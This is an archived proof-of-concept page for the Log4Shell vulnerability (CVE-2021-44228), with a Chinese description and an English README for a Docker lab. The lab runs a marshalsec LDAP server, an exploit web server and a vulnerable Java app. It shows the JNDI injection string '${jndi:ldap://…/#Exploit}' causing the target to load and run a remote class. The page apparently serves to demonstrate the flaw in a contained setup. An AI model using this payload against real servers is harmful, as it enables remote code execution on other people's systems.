POC详情: 9d0ca4ba32d8b25c7b9de53cc56ac511ac22851d

来源
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
介绍
# CVE-2021-44228_Example
## Run each of the 3 sections in a spearate tab/console

### marshalsec LDAP server https://github.com/chilliwebs/marshalsec (Forked from https://github.com/mbechler/marshalsec)
```
docker build -t marshalsec marshalsec/.
docker run -it --rm -p 1389:1389 --add-host=host.docker.internal:172.17.0.1 --name marshalsec marshalsec
```

### The Exploit Web Server
```
docker build -t exploit ./exploit
docker run -it --rm -p 8888:8888 --add-host=host.docker.internal:172.17.0.1 --name exploit exploit
```

### The Guinea Pig java app (running vulnerable versions of java and Log4J)
```
docker build -t guinea_pig guinea_pig/.
docker run -it --rm --add-host=host.docker.internal:172.17.0.1 --name guinea_pig guinea_pig
```

### When running the guinea_pig you should see the following logged:
```
PWND!
[main] ERROR gp.GuineaPig - ${jndi:ldap://host.docker.internal:1389/#Exploit}
```
### "PWND!" is logged from an externally injected class (Exploit)
文件快照

[4.0K] /data/pocs/9d0ca4ba32d8b25c7b9de53cc56ac511ac22851d ├── [4.0K] exploit │   ├── [ 252] Dockerfile │   └── [ 238] Exploit.java ├── [4.0K] guinea_pig │   ├── [ 399] Dockerfile │   ├── [1.6K] pom.xml │   └── [4.0K] src │   └── [4.0K] main │   └── [4.0K] java │   └── [4.0K] gp │   └── [ 720] GuineaPig.java ├── [4.0K] marshalsec │   └── [ 423] Dockerfile └── [ 970] README.md 7 directories, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。